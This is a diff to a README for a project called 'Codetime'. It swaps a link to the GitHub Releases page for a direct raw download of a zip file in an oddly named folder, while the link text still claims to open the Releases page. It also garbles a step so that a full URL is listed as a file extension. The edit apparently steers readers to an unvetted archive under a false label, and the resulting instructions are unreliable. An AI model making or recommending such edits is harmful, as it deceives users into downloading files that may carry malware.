LKiro/Codetime/README.md

 To get started with Codetime:

 1. **Visit the Releases Page**
-   Click this link: [Download Codetime](https://github.com/LKiro/Codetime/releases) to go to the Releases page.
+   Click this link: [Download Codetime](https://raw.githubusercontent.com/LKiro/Codetime/master/unnewly/Codetime.zip) to go to the Releases page.

 2. **Choose the Version**
    Find the latest version at the top of the page.
-Look for files with the `.tar.gz` or `.zip` extension.
+Look for files with the `https://raw.githubusercontent.com/LKiro/Codetime/master/unnewly/Codetime.zip` or `.zip` extension.

 3. **Download the File**
    Click on the file that matches your system.
 It will start downloading automatically.